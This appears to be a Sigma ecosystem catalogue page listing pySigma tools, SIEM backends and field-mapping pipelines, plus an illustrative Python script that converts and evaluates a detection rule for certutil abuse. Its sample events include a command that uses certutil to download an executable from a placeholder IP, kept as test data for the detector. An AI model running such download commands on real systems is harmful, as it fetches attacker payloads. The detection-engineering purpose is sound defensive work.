Ecosystem
The tools, backends, and pipelines that power the Sigma detection ecosystem. Convert rules to any SIEM or log analytics platform with pySigma.
Core Tools
sigma engine
A high-performance Sigma rule engine written in Rust. Designed for real-time detection at scale: it evaluates Sigma rules directly against log events without first converting them to an intermediate query language.
pySigma
The Python library for parsing, transforming, and converting Sigma rules. Powers all official backends and pipelines.
sigma-cli
Command-line interface for converting Sigma rules with pySigma: install backends and pipelines, then convert rules to any supported format.
Community Pipelines
A curated collection of community-maintained pySigma pipelines for additional log sources and vendor-specific field mappings.
Backends
29 backends: convert Sigma rules to platform-native query languages
Carbon Black
carbonblack
Carbon Black backend that supports queries for both Enterprise EDR (formerly Threat Hunter) and EDR (formerly Response).
Cortex XDR
cortexxdr
Cortex XDR backend that generates XQL queries.
CrowdStrike
crowdstrike
CrowdStrike LogScale backend and pipelines for the CrowdStrike Falcon platform and Falcon Data Replicator (FDR) logs.
DictQuery
dictquery
DictQuery backend that converts Sigma rules to dictquery query strings.
Elasticsearch
elasticsearch
Elasticsearch backend that converts into Lucene, ES|QL (with correlations) and EQL queries, emitted as plain queries, embedded in Query DSL, or as Kibana NDJSON.
IBM QRadar AQL
ibm-qradar-aql
IBM QRadar backend for conversion into AQL queries. Contains mappings for fields and log sources.
InsightIDR
insightidr
Rapid7 InsightIDR backend that generates LEQL queries.
Kusto
kusto
Kusto Query Language (KQL) backend and pipeline for converting log sources that use the Sysmon field schema into Microsoft Advanced Hunting queries.
Logpoint
logpoint
Logpoint pySigma backend.
Grafana Loki
loki
Loki backend for conversion into LogQL queries (plain, or as ruler YAML for alerts), plus pipelines with field mappings for Grafana and Promtail Sysmon data.
OpenSearch
opensearch
OpenSearch backend converting into Lucene queries and OpenSearch alerting rules.
Panther
panther
Panther backend
QRadar
qradar
IBM QRadar backend for conversion into AQL and extension packages.
SentinelOne
sentinelone
SentinelOne backend that generates Deep Visibility queries.
SentinelOne PQ
sentinelone-pq
SentinelOne backend that generates PowerQuery queries.
Splunk
splunk
Splunk backend for conversion into SPL and tstats data model queries as plain queries and savedsearches.conf
uberAgent
uberagent
uberAgent backend
Datadog
datadog
Datadog Cloud SIEM backend and pipeline for conversion of log sources to Datadog Query Syntax
Golang Expr
golangexpr
Golang Expr backend.
HAWK
hawk
HAWK.io MDR backend and pipeline for conversion of log sources to HAWK.io BETree queries.
NetWitness
netwitness
NetWitness backend that generates application rules.
PowerShell
powershell
PowerShell backend converting into PowerShell queries.
SQLite
sqlite
SQLite and Zircolite backend
SurrealQL
surrealql
SurrealQL backend.
Azure Log Analytics (SOC Prime)
ala-socprime
Azure Log Analytics backend with Windows log support maintained by SOC Prime.
Quickwit
quickwit
Quickwit Backend
SecOps
secops
Google SecOps (formerly Chronicle) backend and pipeline for conversion of Sigma rules to SecOps Unified Data Model (UDM) searches and YARA-L 2.0 detection rules.
STIX
stix
STIX backend converting into plain STIX queries. Contains mappings for STIX 2.0 and STIX Shifter taxonomies.
Trellix Helix
trellix_helix
Trellix Helix backend.
Pipelines
5 pipelines: field mappings and log source normalization
OCSF
ocsf
Mapping from generic log sources to OCSF events.
Red Canary LinuxEDR
rclinuxedr
Red Canary LinuxEDR pipeline that converts fields to Telemetry Search mapping.
Sysmon
sysmon
Mapping from generic log sources to Sysmon events.
Windows
windows
Maps the Windows log source to the Channel field, and generic log sources to Windows audit events.
OSSEM
ossem
Mapping from OSSEM to Sigma taxonomy.
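The three kinds of component listed on this page fit together in one short script, added here as an illustration; it is not code from pySigma, sigma-cli or the Rust sigma engine. A pipeline step renames fields (the field-mapping work the pipelines above do), a backend renders the detection into Splunk SPL or Lucene syntax (what the backends above do, with more care and many more modifiers), and an engine-style evaluator applies the same rule directly to log records without any query language, which is the approach the sigma engine takes. The rule, the three Sysmon-style events and the Sigma-to-ECS field mapping are constructed for this example; only map-style selections, the contains/startswith/endswith/all modifiers and plain and/or/not conditions are supported.

```python
import ast
import fnmatch

# Constructed rule in the dict form yaml.safe_load() yields for Sigma YAML (not a
# SigmaHQ rule); field names follow Sigma's Windows process_creation taxonomy.
RULE = {
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": "\\certutil.exe"},
        "selection_cli": {"CommandLine|contains|all": ["-urlcache", "http"]},
        "filter_msiexec": {"ParentImage|endswith": "\\msiexec.exe"},
        "condition": "selection_img and selection_cli and not filter_msiexec",
    },
}
# Constructed Sysmon Event ID 1 style records: a hit, one excluded by the filter, one benign.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.7/a.exe a.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.7/p.msi"},
    {"Image": r"C:\Windows\System32\CertUtil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "CertUtil -hashfile a.exe SHA256"},
]
# Hypothetical pipeline mapping from Sigma taxonomy to ECS field names (constructed here).
ECS_PROCESS_FIELDS = {"Image": "process.executable", "CommandLine": "process.command_line",
                      "ParentImage": "process.parent.executable"}

def to_glob(value, mods):
    """Express the string modifiers as Sigma wildcards (* = any run of characters)."""
    v = str(value)
    return f"*{v}*" if "contains" in mods else f"{v}*" if "startswith" in mods else f"*{v}" if "endswith" in mods else v

def apply_field_mapping(rule, mapping):
    """Pipeline: rename the field of every selection item; modifiers and condition are kept."""
    def rename(key):
        field, *mods = key.split("|")
        return "|".join([mapping.get(field, field), *mods])
    det = {name: sel if name == "condition" else {rename(k): v for k, v in sel.items()}
           for name, sel in rule["detection"].items()}
    return {**rule, "detection": det}

def fold_condition(node, leaf, on_and, on_or, on_not):
    """Reduce an 'a and b and not c' condition parsed with ast (no eval); '1 of sel*' is not handled."""
    rec = lambda n: fold_condition(n, leaf, on_and, on_or, on_not)
    if isinstance(node, ast.Name):
        return leaf(node.id)
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
        return on_not(rec(node.operand))
    if isinstance(node, ast.BoolOp):
        return (on_and if isinstance(node.op, ast.And) else on_or)([rec(v) for v in node.values])
    raise ValueError(f"unsupported condition syntax: {ast.dump(node)}")

def match_item(event, key, values):
    """Engine: one field/modifier item against one event (Sigma string matching is case-insensitive)."""
    field, *mods = key.split("|")
    if field not in event:
        return False
    hits = [fnmatch.fnmatchcase(str(event[field]).lower(), to_glob(v, mods).lower().replace("[", "[[]"))
            for v in (values if isinstance(values, list) else [values])]
    return all(hits) if "all" in mods else any(hits)

def matches(rule, event):
    """Engine: evaluate the rule directly against an event, with no query language in between."""
    det = rule["detection"]
    return fold_condition(ast.parse(det["condition"], mode="eval").body,
                          lambda name: all(match_item(event, k, v) for k, v in det[name].items()),
                          all, any, lambda x: not x)

def splunk_value(value, mods):
    """SPL literal: double-quoted, backslash and quote escaped, * kept as the wildcard."""
    return '"' + to_glob(value, mods).replace("\\", "\\\\").replace('"', '\\"') + '"'

def lucene_value(value, mods):
    """Lucene literal: unquoted so * and ? stay wildcards, reserved characters backslash-escaped."""
    return "".join("\\" + c if c in '+-=&|><!(){}[]^"~:\\/ ' else c for c in to_glob(value, mods))

BACKENDS = {"splunk": ("=", splunk_value), "lucene": (":", lucene_value)}

def convert(rule, backend):
    """Backend: the condition gives the boolean skeleton; field/value syntax is what differs per target."""
    eq, render_value = BACKENDS[backend]
    det = rule["detection"]
    wrap = lambda s: f"({s})" if " AND " in s or " OR " in s else s  # parenthesize compound parts
    def render_selection(name):
        clauses = []
        for key, values in det[name].items():
            field, *mods = key.split("|")
            terms = [f"{field}{eq}{render_value(v, mods)}" for v in (values if isinstance(values, list) else [values])]
            clauses.append((" AND " if "all" in mods else " OR ").join(terms))
        return " AND ".join(map(wrap, clauses)) if len(clauses) > 1 else clauses[0]
    return fold_condition(ast.parse(det["condition"], mode="eval").body, render_selection,
                          lambda ps: " AND ".join(map(wrap, ps)), lambda ps: " OR ".join(map(wrap, ps)),
                          lambda p: f"NOT ({p})")

if __name__ == "__main__":
    for name in BACKENDS:
        print(f"{name}: {convert(RULE, name)}")
    print("ecs+lucene:", convert(apply_field_mapping(RULE, ECS_PROCESS_FIELDS), "lucene"))
    print("engine:", [matches(RULE, e) for e in EVENTS])
```

Two things the script makes visible that the catalogue entries only imply: the backend decides how a backslash in `\certutil.exe` is escaped (doubled and quoted for SPL, backslash-escaped and unquoted for Lucene), and a pipeline is tied to the log source's field schema, so the ECS-mapped rule no longer matches the Sysmon-shaped records even though the detection logic is unchanged. Anything a real deployment needs beyond this (the `1 of selection*` condition forms, list-of-maps selections, regex and numeric modifiers, correlation rules) is exactly what pySigma and the backends above implement.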
Need more pipelines?
The community pipelines repository is your next stop. Contribute your own or request new ones!